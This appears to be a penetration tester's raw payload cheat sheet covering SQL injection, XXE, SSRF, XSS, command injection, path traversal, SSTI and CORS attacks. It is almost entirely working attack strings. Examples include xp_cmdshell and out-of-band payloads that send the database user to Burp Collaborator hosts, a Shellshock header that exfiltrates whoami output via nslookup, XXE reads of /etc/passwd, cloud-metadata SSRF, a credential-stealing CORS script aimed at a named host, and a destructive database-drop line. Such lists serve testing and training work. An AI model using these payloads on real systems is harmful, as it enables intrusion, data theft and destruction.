sql injection

1'"
'XOR(if(now()=sysdate(),sleep(10*5),0))OR'

'--
?id=1\
admin--



' or 1=1--

vanilla

and true /false
1' and 1=1 , 1=2 --+

sleep(10)--

33; DECLARE @command varchar(255); SELECT @command='ping zknivz9q0j7isvd5izssm4i1xs3kr9.burpcollaborator.net'; EXEC Master.dbo.xp_cmdshell @command; EXEC sp_SYS_ProtoOp @id=3

33; DECLARE @filename varchar(255); SELECT @filename='\\'+master.sys.fn_varbintohexstr(convert(varbinary,SYSTEM_USER))+'.xyy334me3sujnqmbzw913bw5815gwmmab.burpcollaborator.net\ohno'; EXEC Master.dbo.xp_fileexist @filename; EXEC sp_SYS_ProtoOp @id=3"

(select(0)from(select(sleep(25)))v)

union based
error based
boolean based
time 
oob

; DROP ALL DATABASES;

';--

'; IF (1=2) WAITFOR DELAY '0:0:10'--
'; IF (1=1) WAITFOR DELAY '0:0:10'-- 

 And 1 = sleep(2);--
 
 x'||pg_sleep(10)--
 
 UNION (SELECT 1,2,3 FROM dual);--%';
 
 UNION (SELECT TABLE_NAME, TABLE_SCHEMA, 3 FROM INFORMATION_SCHEMA.TABLES);--



order by 1,2,3 && UNION SELECT NULL-- -- to know no.of columns
union select ----- to know which column is vulnerable
 UNION SELECT NULL,'a',NULL,NULL-- -- to know compatable data type






CSRF

change request method
remove token
different user
check refer - if present remove






XXE

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/"> ]> 
productId=<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo> &storeId=1

file upload avatar -  <?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg> 

content type
POST /action HTTP/1.0
Content-Type: text/xml
Content-Length: 52

<?xml version="1.0" encoding="UTF-8"?><foo>bar</foo> 



SSRF

stockApi=http://localhost/admin 
stockApi=http://192.168.0.68/admin 
Using an alternative IP representation of 127.0.0.1, such as 2130706433, 017700000001, or 127.1. 
GET /api/web_resource/url?q=http://0:6000/ HTTP/1.1
http://[0:0:0:0:0:ffff:127.0.0.1]
Double-URL encode the # to %2523
Change the URL to http://localhost:80%2523@stock.weliketoshop.net/admin/delete?username=carlos
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/"> ]> 
https://www.youtube.com/watch?v=eW4QDUytHrY --  useragent:  () { :; }; /usr/bin/nslookup $(whoami).YOUR-SUBDOMAIN-HERE.burpcollaborator.net referer: http://192.168.0.1:8080

<?php
header("Location: http://localhost:25");
?>




XSS
/?utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e 



RCE

&
&&
|
||
;
;whoami;ls &&whoami |whoami ||whoami

& ping -c 10 127.0.0.1 & 
& whoami > /var/www/static/whoami.txt & 

Purpose of command 	   Linux 			Windows
Name of current user 	whoami 			whoami
Operating system 		uname -a 		ver
Network configuration 	ifconfig 		ipconfig /all
Network connections 	netstat -an 	netstat -an
Running processes 		ps -ef 			tasklist 

& nslookup kgji2ohoyw.web-attacker.com & 




Manipulate response



RFI/LFI
../../etc/passwd



Directory trversal

filename=../../../etc/passwd 

..\..\..\windows\win.ini
..%c0%af or ..%252f, to bypass the input filter. 
../../../etc/passwd%00.png 
....//....//....//etc/passwd



File upload



Captcha




IDOR


SSTI

{{7*'7'}}




CORS

https://subdomain.vulnerable-website.com/?xss=<script>cors-stuff-here</script>


<script>
   var req = new XMLHttpRequest();
   req.onload = reqListener;
   req.open('get','https://account-sprint.dynatracelabs.com//my/api/v1/static/resource-mappings',true);
   req.withCredentials = true;
   req.send();

   function reqListener() {
       location='/log?key='+this.responseText;
   };
</script> 




Request smuggling